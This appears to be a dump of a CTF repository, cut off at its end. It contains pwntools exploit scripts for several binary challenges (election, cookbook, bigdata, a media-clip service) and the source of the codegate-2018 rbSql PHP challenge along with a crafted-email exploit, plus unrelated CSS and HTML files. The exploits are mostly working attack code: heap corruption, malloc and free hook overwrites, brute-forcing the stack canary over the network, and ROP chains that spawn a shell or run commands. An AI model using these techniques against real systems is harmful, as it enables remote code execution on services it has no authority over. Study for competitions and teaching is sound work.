-------------------------------------------------------------------------------- 1 | # Need a couple of tries to get shell, some issue in a_write 2 | 3 | from pwn import * 4 | 5 | #context.log_level = 'debug' 6 | context.terminal = ['tmux', 'splitw', '-h'] 7 | 8 | file = "./election" 9 | bin = ELF(file) 10 | libc = ELF("libc-2.23.so") 11 | 12 | env = {"LD_PRELOAD": os.path.join(os.getcwd(), "./libc-2.23.so")} 13 | 14 | #conn = remote("election.pwn.seccon.jp", 28349) 15 | conn = process(file, env=env) 16 | 17 | def stand(name): 18 | conn.recvuntil("chocolate\n>>") 19 | conn.sendline("1") 20 | conn.recvuntil("Enter the name") 21 | conn.sendline(name) 22 | 23 | def vote(show, name, name2 = None, leak=False): 24 | conn.recvuntil("chocolate\n>>") 25 | conn.sendline("2") 26 | conn.recvuntil("Show candidates") 27 | conn.sendline(show) 28 | if show == "y": 29 | conn.recvuntil("Candidates") 30 | if not leak: 31 | conn.recvuntil("name of the") 32 | conn.sendline(name) 33 | if name2 is not None: 34 | if not leak: 35 | conn.recvuntil("I'm not 'Oshima'") 36 | conn.sendline(name2) 37 | 38 | def result(): 39 | conn.recvuntil("chocolate\n>>") 40 | conn.sendline("3") 41 | 42 | def a_add(addr, value, step=False): 43 | if step and value > 0x70: 44 | a_add(addr, 0x70, step) 45 | value -= 0x70 46 | payload = "yes".ljust(0x20, "\x00") 47 | payload += p64(addr - 0x10) 48 | payload += p8(value) 49 | vote("n", "oshima", payload) 50 | 51 | def a_write(addr, value, orig = "", step=False): 52 | """Assuming existing value was 0""" 53 | while value != "" or orig != "": 54 | v = ord(value[0]) 55 | if orig is not "": 56 | v = v - ord(orig[0]) 57 | if v < 0: 58 | v += 0x100 59 | a_add(addr, v, step) 60 | orig = orig[1:] 61 | else: 62 | a_add(addr, v, step) 63 | addr += 1 64 | value = value[1:] 65 | 66 | fake_chunk1 = 0x602040 67 | 68 | ojima_str = fake_chunk1 + 0x100 69 | 70 | # Creating a fake structure inside string 71 | fake_struct = "a"*8 # fd 72 | fake_struct += "a"*8 # bk 73 | fake_struct += p64(ojima_str) # prev_size of a structure heap chunk 74 | stand(fake_struct) 75 | stand("random_string") # This is the next heap chunk containing structure 76 | stand("ojima") # This is needed for leaking heap address 77 | 78 | a_write(ojima_str, "ojima", step=True) # To continue arbitrary write 79 | 80 | a_add(bin.symbols['list'], 0xb0) # To out fake structure 81 | 82 | for i in range(0x20): 83 | vote("n", "ojima") # Increment name pointer to heap pointer 84 | 85 | a_add(bin.symbols['list'], 0x50) # List pointer now points back to our 86 | 87 | # Leaking heap address 88 | vote("y", "random_name", leak=True) 89 | conn.recvuntil("ojima\n* ") 90 | 91 | heap_addr = u64(conn.recvline().strip().ljust(0x8, "\x00")) 92 | log.info("Leaked heap address: " + hex(heap_addr)) 93 | 94 | chunk_addr = heap_addr - 0x60 # Address of the second chunk in the list 95 | current_name_ptr = heap_addr - 0x20 96 | 97 | a_write(chunk_addr, p64(bin.got['srand']), p64(current_name_ptr)) 98 | 99 | # Leaking libc address 100 | vote("y", "random_name", leak=True) 101 | conn.recvuntil("ojima\n* ") 102 | srand_addr = u64(conn.recvline().strip().ljust(0x8, "\x00")) 103 | log.info("Leaked libc address: " + hex(srand_addr)) 104 | 105 | libc_base = srand_addr - libc.symbols['srand'] 106 | malloc_hook_addr = libc_base + libc.symbols['__malloc_hook'] 107 | one_shot_gadget = libc_base + 0xf0274 108 | 109 | a_write(malloc_hook_addr, p64(one_shot_gadget), step=True) 110 | 111 | a_write(bin.symbols['lv'], "\x00", "\x02") 112 | 113 | stand("haha") 114 | 115 | conn.interactive() 116 | 117 | -------------------------------------------------------------------------------- /boston-key-party-2016/cookbook/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.log_level = 'debug' 4 | context.terminal = ['tmux', 'splitw', '-h'] 5 | 6 | file = "./cookbook" 7 | bin = ELF(file) 8 | libc = ELF("/lib/i386-linux-gnu/libc.so.6") 9 | #libc = ELF("./libc.so.6") 10 | 11 | env = {"LD_PRELOAD": os.path.join(os.getcwd(), "./libc.so.6")} 12 | 13 | conn = process(file) 14 | #conn = gdb.debug(file) 15 | 16 | def menu(ch): 17 | conn.recvuntil("[q]uit") 18 | conn.sendline(ch) 19 | 20 | def list_i(): 21 | menu("l") 22 | 23 | def list_r(): 24 | menu("r") 25 | 26 | def add_i(): 27 | menu("a") 28 | 29 | def add_i_menu(ch): 30 | conn.recvuntil("(doesn't quit") 31 | conn.sendline(ch) 32 | 33 | def list_current_stats(): 34 | add_i_menu("l") 35 | 36 | def new_ingredient(): 37 | add_i_menu("n") 38 | 39 | def discard_ingredient(): 40 | add_i_menu("d") 41 | 42 | def give_name_to_ingredient(name): 43 | add_i_menu("g") 44 | conn.sendline(name) 45 | 46 | def price_ingredient(price): 47 | add_i_menu("p") 48 | conn.sendline(str(price)) 49 | 50 | def set_calories(cal): 51 | add_i_menu("s") 52 | conn.sendline(str(cal)) 53 | 54 | def quit_ingredient(): 55 | add_i_menu("q") 56 | 57 | def export_ingredient(): 58 | add_i_menu("e") 59 | conn.recvuntil("saved") 60 | 61 | def create_recipe(): 62 | menu("c") 63 | 64 | def create_recipe_menu(ch): 65 | conn.recvuntil("[q]uit") 66 | conn.sendline(ch) 67 | 68 | def new_recipe(): 69 | create_recipe_menu("n") 70 | 71 | def discard_recipe(): 72 | create_recipe_menu("d") 73 | 74 | def add_ingredient_recipe(name): 75 | create_recipe_menu("a") 76 | conn.recvuntil("which ingredient to add?") 77 | conn.sendline(name) 78 | 79 | def remove_ingredient_recipe(name): 80 | create_recipe_menu("r") 81 | conn.recvuntil("ingredient to remove?") 82 | conn.sendline(name) 83 | 84 | def give_name_recipe(name): 85 | create_recipe_menu("g") 86 | conn.sendline(name) 87 | 88 | def save_recipe(): 89 | create_recipe_menu("s") 90 | 91 | def print_recipe(): 92 | create_recipe_menu("p") 93 | 94 | def quit_recipe(): 95 | create_recipe_menu("q") 96 | 97 | def exterminate_i(i): 98 | menu("e") 99 | conn.recvuntil("which ingredient") 100 | conn.sendline(i) 101 | 102 | def set_cook_name(size, name): 103 | menu("g") 104 | conn.recvuntil("long is ") 105 | conn.sendline(str(hex(size))) 106 | conn.send(name) 107 | 108 | def remove_cook_name(): 109 | menu("R") 110 | 111 | name = "vampire" 112 | 113 | conn.recvuntil("name?") 114 | conn.sendline(name) 115 | 116 | # Vulnerabilities: 117 | # 118 | # - main_menu - double free cookbook ptr 119 | # - create_recipe - double free + use after 120 | # - give_name_to_recipe - heap overflow 121 | 122 | # Leaking libc and heap address 123 | 124 | # Adding two chunks in unsorted bin of size 0x90 125 | 126 | set_cook_name(0x90, "a\n") 127 | add_i() 128 | new_ingredient() 129 | give_name_to_ingredient("name1") 130 | export_ingredient() 131 | quit_ingredient() 132 | remove_cook_name() 133 | exterminate_i("onion") 134 | 135 | add_i() 136 | new_ingredient() 137 | give_name_to_ingredient("name2") 138 | export_ingredient() 139 | quit_ingredient() 140 | 141 | list_i() 142 | conn.recvuntil("name2") 143 | conn.recvuntil("calories: ") 144 | libc_leak = int(conn.recvline()) 145 | if libc_leak < 0: 146 | libc_leak += 0x100000000 147 | libc.address = libc_leak - 0xf76d97b0 + 0xf7527000 148 | conn.recvuntil("price: ") 149 | heap_leak = int(conn.recvline()) 150 | if heap_leak < 0: 151 | heap_leak += 0x100000000 152 | 153 | create_recipe() 154 | new_recipe() 155 | give_name_recipe("\xff"*0x400) 156 | quit_recipe() 157 | 158 | malloc_size = libc.symbols['__free_hook'] - (heap_leak - 0x83a52a8 + 0x83a5818) 159 | set_cook_name(malloc_size, "a\n") 160 | quit_ingredient() 161 | set_cook_name(0x150, "a"*0x10 + p32(libc.symbols['system']) + "\n") 162 | 163 | set_cook_name(100, "/bin/sh\x00\n") 164 | remove_cook_name() 165 | 166 | log.info("Libc leak: " + hex(libc_leak)) 167 | log.info("Heap leak: " + hex(heap_leak)) 168 | 169 | conn.interactive() 170 | -------------------------------------------------------------------------------- /codegate-2018/rbSql/style.css: -------------------------------------------------------------------------------- 1 | input{ 2 | border:1px solid #CFDDDD; 3 | } 4 | 5 | body { 6 | margin: 0; 7 | padding : 0; 8 | background: #ccc url(images/bg.jpg) center repeat; 9 | color: #555; 10 | } 11 | /*WRAP*/ 12 | #container { 13 | width: 760px; 14 | margin-left: auto; 15 | margin-right: auto; 16 | padding: 0; 17 | font: 76% "Trebuchet MS","lucida sans", tahoma, sans-serif; 18 | line-height: 1.8em; 19 | background: transparent; 20 | color: #666; 21 | } 22 | /*TOP BANNER*/ 23 | #banner { 24 | padding: 0; 25 | margin-bottom: 0; 26 | height: 225px; 27 | border-bottom:3px solid #fff; 28 | background: #82B64D url(images/wine.jpg); 29 | color: #000; 30 | } 31 | /*TOP NAVIGATION*/ 32 | #navbar ul { 33 | float:left; 34 | width:100%; 35 | padding:0; 36 | margin:0; 37 | list-style-type:none; 38 | font-size: 130%; 39 | text-align: center; 40 | border-bottom:3px solid #fff; 41 | background: #385900; 42 | color: #000; 43 | } 44 | #navbar a { 45 | float:left; 46 | width:6em; 47 | height:30px; 48 | text-decoration:none; 49 | color:#fff; 50 | background:#385900; 51 | padding:0.5em 0.6em; 52 | border-right:1px solid #fff; 53 | } 54 | #navbar a:hover { 55 | background:#8BBA00; 56 | color: #000; 57 | } 58 | #navbar li { 59 | display:inline; 60 | } 61 | /*MAIN CONTENT*/ 62 | #content { 63 | padding: 1em; 64 | margin-left: 200px; 65 | } 66 | /*SIDEBAR*/ 67 | #sidebar { 68 | float: left; 69 | width: 160px; 70 | margin: 0; 71 | padding: 0 1em 0 1em; 72 | } 73 | /*SIDE MENU*/ 74 | #sidebar ul { 75 | list-style: none; 76 | margin: 0 0 20px 0; 77 | padding: 0; 78 | } 79 | #sidebar ul li { 80 | display: inline; 81 | padding: 0; 82 | margin: 0; 83 | } 84 | #sidebar ul li a { 85 | display: block; 86 | color: #385900; 87 | background: inherit; 88 | text-decoration: none; 89 | margin: 0; 90 | padding: 5px 0 5px 0; 91 | border-bottom: 1px solid #C0C0C0; 92 | } 93 | #sidebar ul li a:hover { 94 | text-decoration: none; 95 | background: #E6E7E9; 96 | color: #DA7910; 97 | } 98 | /*FOOTER*/ 99 | #footer { 100 | clear: both; 101 | width:750px; 102 | padding: 5px; 103 | margin: 0; 104 | font-size: 0.8em; 105 | border-top: 3px solid #fff; 106 | border-bottom: 3px solid #fff; 107 | background: #88C706; 108 | color: #000; 109 | } 110 | #footer a:link, #footer a:visited { 111 | text-decoration : none; 112 | background : inherit; 113 | color : #000; 114 | } 115 | #footer a:hover { 116 | text-decoration : underline; 117 | background : inherit; 118 | color : #fff; 119 | } 120 | /*LINKS*/ 121 | a:link, a:visited { 122 | text-decoration : none; 123 | background : inherit; 124 | color : #DA7910; 125 | } 126 | a:hover { 127 | text-decoration : underline; 128 | background : inherit; 129 | color : #385900; 130 | } 131 | /*TYPOGRAPHY*/ 132 | h1 { 133 | margin: 0; 134 | padding: 30px 0 0 20px; 135 | font-size: 175%; 136 | letter-spacing: 3px; 137 | } 138 | h2 { 139 | margin-top: 10px; 140 | padding: 10px 0 10px 0; 141 | font-size: 160%; 142 | letter-spacing: 3px; 143 | background : transparent; 144 | color : #385900; 145 | } 146 | h3 { 147 | margin: 0; 148 | padding: 10px 0 10px 0; 149 | font-size: 160%; 150 | letter-spacing: 3px; 151 | background : inherit; 152 | color : #385900; 153 | } 154 | blockquote { 155 | font-weight : bold; 156 | font-style : italic; 157 | color : #b29b35; 158 | } 159 | /*CLASS*/ 160 | .clear { 161 | clear: both; 162 | overflow: hidden; 163 | width: 0; 164 | height: 0; 165 | } 166 | .slogan { 167 | margin: 0 0 0 50px; 168 | letter-spacing: 3px; 169 | } 170 | 171 | .post{ 172 | background: #E6E7E9; 173 | padding: 3px; 174 | margin: 20px 10px 10px 5px; 175 | font-size: 80%; 176 | } 177 | .post .date { 178 | background: url(images/clock.gif) no-repeat left center; 179 | padding-left: 15px; 180 | margin: 0 15px 0 5px; 181 | } 182 | .post .comments { 183 | background: url(images/comment.gif) no-repeat left center; 184 | padding-left: 15px; 185 | margin: 0 15px 0 5px; 186 | } 187 | .post .readmore { 188 | background: url(images/document.gif) no-repeat left center; 189 | padding-left: 15px; 190 | margin: 0 15px 0 5px; 191 | } -------------------------------------------------------------------------------- /codegate-2018/rbSql/exploit.php: -------------------------------------------------------------------------------- 1 | $pointer){ 66 | if($rawData[$pointer] == STR){ 67 | $pointer++; 68 | $length = ord($rawData[$pointer]); 69 | $pointer++; 70 | $parsed[$idx] = substr($rawData,$pointer,$length); 71 | $pointer += $length; 72 | } 73 | elseif($rawData[$pointer] == ARR){ 74 | $pointer++; 75 | $arrayCount = ord($rawData[$pointer]); 76 | $pointer++; 77 | for($i=0;$i<$arrayCount;$i++){ 78 | if(substr($rawData,$pointer,1) == ARR){ 79 | $pointer++; 80 | $arrayCount2 = ord($rawData[$pointer]); 81 | $pointer++; 82 | for($j=0;$j<$arrayCount2;$j++){ 83 | $pointer++; 84 | $length = ord($rawData[$pointer]); 85 | $pointer++; 86 | $parsed[$idx][$i][$j] = substr($rawData,$pointer,$length); 87 | $pointer += $length; 88 | } 89 | } 90 | else{ 91 | $pointer++; 92 | $length = ord(substr($rawData,$pointer,1)); 93 | $pointer++; 94 | $parsed[$idx][$i] = substr($rawData,$pointer,$length); 95 | $pointer += $length; 96 | } 97 | } 98 | } 99 | $idx++; 100 | if($idx > 2048) break; 101 | } 102 | return $parsed[0]; 103 | } 104 | 105 | function rbPack($data){ 106 | $rawData = ""; 107 | if(is_string($data)){ 108 | $rawData .= STR . chr(strlen($data)) . $data; 109 | } 110 | elseif(is_array($data)){ 111 | $rawData .= ARR . chr(count($data)); 112 | for($idx=0;$idx 16) var_dump("id too long"); 121 | if(!ctype_alnum($uid)) var_dump("id must be alnum!"); 122 | if(strlen($umail) > 256) var_dump("email too long"); 123 | $upw = md5($upw); 124 | $uip = "127.0.0.1"; 125 | $table = rbSql("create","member_".$uid,["id","mail","pw","ip","lvl"]); 126 | $table = rbSql("insert","member_".$uid,[$uid,$umail,$upw,$uip,"1"], $table); 127 | return $table; 128 | } 129 | } 130 | 131 | function login($uid, $upw, $contents) { 132 | return rbSql("select","member_".$uid,["pw",md5($upw)], $contents); 133 | } 134 | 135 | // Simulating the login flow 136 | $umail = STR . "\x20" . "1a1dc91c907325c69271ddf0c944bc72"; 137 | $umail .= STR . "\x01" . "b"; 138 | $umail .= STR . "\x01" . "2"; 139 | $umail .= str_repeat("z", 256 - strlen($umail)); 140 | $uid = "myid2"; 141 | $upw = "pass"; 142 | 143 | $table = register($uid, $upw, $umail); 144 | 145 | // Storing and retreiving again from file 146 | $contents = rbParse(rbPack($table)); 147 | 148 | $res = login($uid, $upw, $contents); 149 | 150 | // Use the following umail while registering 151 | // Rest process is same 152 | var_dump(urlencode($umail)); -------------------------------------------------------------------------------- /30c3-2013/bigdata/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.log_level = 'warning' 4 | 5 | bin = ELF("./server") 6 | libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") 7 | 8 | # Brute forcing canary 9 | canary = "" 10 | for j in range(len(canary), 8): 11 | for i in range(256): 12 | try: 13 | conn = remote("localhost", 1234) 14 | payload = "a"*0x2008 + canary + chr(i) 15 | conn.recvuntil("insert your data") 16 | conn.send(payload) 17 | conn.recvuntil("We received") 18 | conn.recvuntil("data saved") 19 | canary += chr(i) 20 | log.warning("Canary: " + str(j) + " - " + canary.encode('hex')) 21 | break 22 | except: 23 | conn.close() 24 | pass 25 | 26 | # Brute force rbp 27 | rbp = "" 28 | for j in range(len(rbp), 8): 29 | for i in range(256): 30 | try: 31 | conn = remote("localhost", 1234) 32 | payload = "a"*0x2008 + canary + rbp + chr(i) 33 | conn.recvuntil("insert your data") 34 | conn.send(payload) 35 | conn.recvuntil("We received") 36 | conn.recvuntil("data saved") 37 | rbp += chr(i) 38 | log.warning("RBP: " + str(j) + " - " + rbp.encode('hex')) 39 | break 40 | except: 41 | conn.close() 42 | pass 43 | 44 | # Brute force binary address 45 | bin_addr = "\x15" 46 | for j in range(len(bin_addr), 8): 47 | for i in range(256): 48 | try: 49 | conn = remote("localhost", 1234) 50 | payload = "a"*0x2008 + canary + rbp + bin_addr + chr(i) 51 | conn.recvuntil("insert your data") 52 | conn.send(payload) 53 | conn.recvuntil("We received") 54 | conn.recvline(timeout=0.5) 55 | if "data saved" in conn.recvline(timeout=0.5): 56 | bin_addr += chr(i) 57 | log.warning("Bin address: " + str(j) + \ 58 | " - " + bin_addr.encode('hex')) 59 | break 60 | except: 61 | conn.close() 62 | pass 63 | 64 | # Leaking libc 65 | conn = remote("localhost", 1234) 66 | 67 | bin.address = u64(bin_addr) - 0xe15 68 | 69 | """ 70 | ec6: 48 8b 5c 24 08 mov rbx,QWORD PTR [rsp+0x8] 71 | ecb: 48 8b 6c 24 10 mov rbp,QWORD PTR [rsp+0x10] 72 | ed0: 4c 8b 64 24 18 mov r12,QWORD PTR [rsp+0x18] 73 | ed5: 4c 8b 6c 24 20 mov r13,QWORD PTR [rsp+0x20] 74 | eda: 4c 8b 74 24 28 mov r14,QWORD PTR [rsp+0x28] 75 | edf: 4c 8b 7c 24 30 mov r15,QWORD PTR [rsp+0x30] 76 | ee4: 48 83 c4 38 add rsp,0x38 77 | ee8: c3 ret 78 | """ 79 | payload = "a"*0x2008 + canary + rbp + \ 80 | p64(bin.address + 0xec6) + \ 81 | p64(0) + \ 82 | p64(0) + \ 83 | p64(0) + \ 84 | p64(bin.got['dprintf']) + \ 85 | p64(0) + \ 86 | p64(bin.got['read']) + \ 87 | p64(4) 88 | 89 | """ 90 | eb0: 4c 89 ea mov rdx,r13 91 | eb3: 4c 89 f6 mov rsi,r14 92 | eb6: 44 89 ff mov edi,r15d 93 | eb9: 41 ff 14 dc call QWORD PTR [r12+rbx*8] 94 | """ 95 | payload += p64(bin.address + 0xeb0) 96 | 97 | conn.recvuntil("insert your data") 98 | conn.send(payload) 99 | conn.recvuntil("thanks.\n") 100 | 101 | libc_leak = u64(conn.recvn(6) + "\x00\x00") 102 | conn.close() 103 | 104 | log.warning("Libc leak: " + hex(libc_leak)) 105 | libc.address = libc_leak - libc.symbols['read'] 106 | 107 | conn = remote("localhost", 1234) 108 | 109 | bin_sh_addr = next(libc.search("/bin/sh")) 110 | 111 | """ 112 | 0x0000000000021102 : pop rdi ; ret 113 | """ 114 | pop_rdi_gadget = libc.address + 0x21102 115 | 116 | """ 117 | 0x00000000001150c9 : pop rdx ; pop rsi ; ret 118 | """ 119 | pop_rdx_rsi_gadget = libc.address + 0x1150c9 120 | 121 | payload = "a"*0x2008 + canary + rbp + \ 122 | p64(pop_rdi_gadget) + \ 123 | p64(4) + \ 124 | p64(pop_rdx_rsi_gadget) + \ 125 | p64(0x20) + \ 126 | p64(bin.address + 0x2020D0) + \ 127 | p64(libc.symbols['read']) + \ 128 | p64(pop_rdi_gadget) + \ 129 | p64(bin.address + 0x2020D0) + \ 130 | p64(libc.symbols['system']) 131 | 132 | conn.recvuntil("insert your data") 133 | conn.send(payload) 134 | conn.recvuntil("thanks.") 135 | 136 | conn.sendline("touch pwned\x00") 137 | 138 | conn.close() 139 | -------------------------------------------------------------------------------- /codegate-2018/rbSql/index.php: -------------------------------------------------------------------------------- 1 | 7 |

Login

8 |

9 |

10 | 11 | 12 | 13 | 14 | 15 |
ID
PW
16 |
17 |

18 | 22 |

Join

23 |

24 |

25 | 26 | 27 | 28 | 29 | 30 | 31 |
ID
MAIL
PW
32 |
33 |

34 | location.href='./';"); 46 | } 47 | else error("login fail"); 48 | } 49 | elseif($page == "join_chk"){ 50 | $uid = $_POST['uid']; 51 | $umail = $_POST['umail']; 52 | $upw = $_POST['upw']; 53 | if(($uid) && ($upw) && ($umail)){ 54 | if(strlen($uid) < 3) error("id too short"); 55 | if(strlen($uid) > 16) error("id too long"); 56 | if(!ctype_alnum($uid)) error("id must be alnum!"); 57 | if(strlen($umail) > 256) error("email too long"); 58 | include "dbconn.php"; 59 | $upw = md5($upw); 60 | $uip = $_SERVER['REMOTE_ADDR']; 61 | if(rbGetPath("member_".$uid)) error("id already existed"); 62 | $ret = rbSql("create","member_".$uid,["id","mail","pw","ip","lvl"]); 63 | if(is_string($ret)) error("error"); 64 | $ret = rbSql("insert","member_".$uid,[$uid,$umail,$upw,$uip,"1"]); 65 | if(is_string($ret)) error("error"); 66 | exit(""); 67 | } 68 | else error("join fail"); 69 | } 70 | elseif($page == "photo"){ 71 | ?> 72 |

Photo

73 |

74 |

75 |

76 |

77 | 81 |

Music Video

82 |

83 |

84 |

85 |

86 | uid : {$_SESSION['uid']}

level : "; 90 | if($_SESSION['lvl'] == 1) echo "Guest"; 91 | elseif($_SESSION['lvl'] == 2) echo "Admin"; 92 | echo "

"; 93 | include "dbconn.php"; 94 | $ret = rbSql("select","member_".$_SESSION['uid'],["id",$_SESSION['uid']]); 95 | echo "

mail : {$ret['1']}

ip : {$ret['3']}

"; 96 | if($_SESSION['lvl'] === "2"){ 97 | echo "

Flag :

"; 98 | include "/flag"; 99 | rbSql("delete","member_".$_SESSION['uid'],["id",$_SESSION['uid']]); 100 | } 101 | } 102 | elseif($page == "logout"){ 103 | session_destroy(); 104 | exit(""); 105 | } 106 | else{ 107 | ?> 108 |

ㅋrystal :/

109 |

110 | -------------------------------------------------------------------------------- /insomni-hack-18/sapeloshop/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | Jackie Stewart's Sapeurs Shop 10 | 11 | 12 | 13 | 14 | 15 | 16 | 30 | 31 | 32 | 33 | 34 |
35 |
36 |
37 | Home 38 | My Cart 39 |
40 |
41 |
42 | 43 |
44 | 45 |
46 |
47 |

The sapelogie prophet

48 | 49 |

Jackie Stewart

50 |

Real sapeurs know were to shop! You can buy everything here to look just like me!

51 |
52 |
53 | 54 |
55 |
56 | 57 |
58 |
59 | eyewear_dolce.jpg 60 |

The eyewear, Dolce & Gabbana.

61 |
62 |
63 | paul_smith_suit.jpg 64 |

The suit. Paul Smith. Super 160'. It's not anything.

65 |
66 |
67 | brown_boxer.jpg 68 |

The brown boxer short assorted to the suit.

69 |
70 |
71 | black_belt.jpg 72 |

The belt. Black as the shoes.

73 |
74 |
75 | armani_tie.jpg 76 |

The Armani Tie, very mystic.

77 |
78 |
79 | black_shoes.jpg 80 |

The black shoes.

81 |
82 |
83 | brown_socks.jpg 84 |

The brown socks. Assorted to the boxer.

85 |
86 |
87 | brown_watch.jpg 88 |

The brown watch, function with blood.

89 |
90 |
91 | 92 |
93 |
94 | 95 |
96 | 97 |
98 |
99 |

© Jackie Stewart. Gabao RPZ à point 0.

100 |
101 |
102 | 103 | 104 | -------------------------------------------------------------------------------- /codegate-2018/rbSql/dbconn.php: -------------------------------------------------------------------------------- 1 | $pointer){ 117 | if($rawData[$pointer] == STR){ 118 | $pointer++; 119 | $length = ord($rawData[$pointer]); 120 | $pointer++; 121 | $parsed[$idx] = substr($rawData,$pointer,$length); 122 | $pointer += $length; 123 | } 124 | elseif($rawData[$pointer] == ARR){ 125 | $pointer++; 126 | $arrayCount = ord($rawData[$pointer]); 127 | $pointer++; 128 | for($i=0;$i<$arrayCount;$i++){ 129 | if(substr($rawData,$pointer,1) == ARR){ 130 | $pointer++; 131 | $arrayCount2 = ord($rawData[$pointer]); 132 | $pointer++; 133 | for($j=0;$j<$arrayCount2;$j++){ 134 | $pointer++; 135 | $length = ord($rawData[$pointer]); 136 | $pointer++; 137 | $parsed[$idx][$i][$j] = substr($rawData,$pointer,$length); 138 | $pointer += $length; 139 | } 140 | } 141 | else{ 142 | $pointer++; 143 | $length = ord(substr($rawData,$pointer,1)); 144 | $pointer++; 145 | $parsed[$idx][$i] = substr($rawData,$pointer,$length); 146 | $pointer += $length; 147 | } 148 | } 149 | } 150 | $idx++; 151 | if($idx > 2048) break; 152 | } 153 | return $parsed[0]; 154 | } 155 | 156 | function rbPack($data){ 157 | $rawData = ""; 158 | if(is_string($data)){ 159 | $rawData .= STR . chr(strlen($data)) . $data; 160 | } 161 | elseif(is_array($data)){ 162 | $rawData .= ARR . chr(count($data)); 163 | for($idx=0;$idx>>") 18 | conn.sendline(str(choice)) 19 | if idx is not None: 20 | conn.recvuntil("Enter index") 21 | conn.sendline(str(idx)) 22 | 23 | def clip_menu(choice): 24 | conn.recvuntil(">>>") 25 | conn.sendline(str(choice)) 26 | 27 | def add_video(res, fps, no, data, desc): 28 | """ 8 4 4 no 0x2f 29 | malloc(0x50) 30 | """ 31 | menu(1) 32 | clip_menu(1) 33 | conn.recvuntil("Video Resolution") 34 | conn.send(res) 35 | conn.recvuntil("FPS :") 36 | conn.send(fps) 37 | conn.recvuntil("Number of Frames") 38 | conn.send(p32(no)) 39 | conn.recvuntil("Video Data") 40 | conn.send(data) 41 | conn.recvuntil("Add description") 42 | conn.send(desc) 43 | 44 | def add_audio(bitrate, length, data, desc): 45 | """ 2 4 length 0x2f 46 | malloc(0x48) 47 | """ 48 | menu(1) 49 | clip_menu(2) 50 | conn.recvuntil("Audio Bitrate") 51 | conn.send(bitrate) 52 | conn.recvuntil("Audio Length") 53 | conn.send(p32(length)) 54 | conn.recvuntil("Audio Data") 55 | conn.send(data) 56 | conn.recvuntil("Add description") 57 | conn.send(desc) 58 | 59 | def add_sub(length, subtitle, lang=None): 60 | """ 4 length 4 61 | malloc(0x18) 62 | """ 63 | menu(1) 64 | clip_menu(3) 65 | if lang is not None: 66 | conn.recvuntil("Subtitle Language") 67 | conn.send(lang) 68 | conn.recvuntil("Subtitle Length") 69 | conn.send(p32(length)) 70 | conn.recvuntil("Add Subtitle") 71 | conn.send(subtitle) 72 | 73 | def add_meta(date, owner): 74 | """ 0x1f 0x1f 75 | malloc(0x48) 76 | """ 77 | menu(1) 78 | clip_menu(4) 79 | conn.recvuntil("Date of Creation") 80 | conn.send(date) 81 | conn.recvuntil("Owner") 82 | conn.send(owner) 83 | 84 | def edit_video(idx, res, fps, no, data, desc): 85 | menu(2, idx) 86 | conn.recvuntil("Video Resolution") 87 | conn.send(res) 88 | conn.recvuntil("FPS :") 89 | conn.send(fps) 90 | conn.recvuntil("Number of Frames") 91 | conn.send(p32(no)) 92 | conn.recvuntil("Video Data") 93 | conn.send(data) # UAF 94 | conn.recvuntil("Edit description") 95 | conn.send(desc) 96 | 97 | def edit_audio(idx, bitrate, length, data, desc): 98 | menu(2, idx) 99 | conn.recvuntil("Audio Bitrate") 100 | conn.send(bitrate) 101 | conn.recvuntil("Audio Length") 102 | conn.send(p32(length)) 103 | # Free earlier data and malloc again 104 | conn.recvuntil("Audio Data") 105 | conn.send(data) 106 | conn.recvuntil("Edit description") 107 | conn.send(desc) 108 | 109 | def edit_sub(idx, lang, data): 110 | menu(2, idx) 111 | conn.recvuntil("New Language") 112 | conn.send(lang) 113 | conn.recvuntil("Edit data") 114 | conn.send(data) 115 | 116 | def edit_meta(idx, date, owner): 117 | menu(2, idx) 118 | conn.recvuntil("Date of Creation") 119 | conn.send(date) 120 | conn.recvuntil("Owner") 121 | conn.send(owner) 122 | 123 | def play_video(idx, l): 124 | menu(3, idx) 125 | conn.recvuntil("Playing video...\n") 126 | leak = conn.recvn(l) 127 | res = "" 128 | for i in leak: 129 | res += chr(ord(i) ^ 0xcc) 130 | return res 131 | 132 | def play_audio(idx): 133 | """ Leaks only if integer is two char """ 134 | menu(3, idx) 135 | conn.recvuntil(": ") 136 | 137 | def delete(idx): 138 | """free(...); sets to 0""" 139 | menu(4, idx) 140 | 141 | conn.recvuntil("What is your movie name?\n") 142 | conn.sendline("vampire") 143 | 144 | # Leaking heap address 145 | add_video("a", "b", 10, "aa", "bb") # 0 146 | 147 | add_video("a", "b", 10, "aa", "bb") # 1 148 | edit_video(0, "a", "b", 0x48, p64(0) + "\x00"*0x40, "bb") 149 | add_audio("a", 10, "data", "desc") # 2 150 | leak = play_video(0, 0x48) 151 | heap_leak = u64(leak[0x10:0x18]) 152 | 153 | delete(0) # Audio chunk at 2 will be cleared 154 | 155 | audio_real_vtable = 0x402938 156 | 157 | def a_read(addr, l, j): 158 | res = "" 159 | for i in range(l): 160 | # Rewriting the fake audio chunk 161 | fake_audio_chunk = p64(audio_real_vtable) + \ 162 | p32(0) + \ 163 | p32(0) + \ 164 | p64(addr) + \ 165 | "desc" 166 | add_sub(0x48, fake_audio_chunk, lang="a") # j 167 | play_audio(2) 168 | leak = conn.recvline().strip() 169 | res += chr(int(leak) ^ 0x55) 170 | delete(j) 171 | j += 1 172 | addr += 1 173 | return res 174 | 175 | read_addr = u64(a_read(bin.got['read'], 8, 3)) 176 | 177 | # Putting a vtable at a known address 178 | one_gadget_addr = read_addr - libc.symbols['read'] + 0xf1117 179 | fake_vtable = p64(one_gadget_addr)*4 180 | 181 | add_video("a", "b", 10, "aa", "bb") # 11 182 | edit_video(11, "a", "b", 0x48, "\x00"*0x48, "bb") 183 | add_audio("a", 8*4, fake_vtable, "desc") # 12 184 | leak = play_video(11, 0x48) 185 | fake_vtable_addr = u64(leak[0x10:0x18]) 186 | 187 | delete(11) # Audio chunk at 12 will be cleared 188 | 189 | # Controlling RIP 190 | fake_audio_chunk = p64(fake_vtable_addr) 191 | add_sub(0x48, fake_audio_chunk, lang="a") 192 | #pause() 193 | play_audio(12) 194 | 195 | log.info("Heap leak: " + hex(heap_leak)) 196 | log.info("Read addr: " + hex(read_addr)) 197 | 198 | conn.interactive() 199 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/client/src/ch/scrt/Muggle.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 3 | */ 4 | package 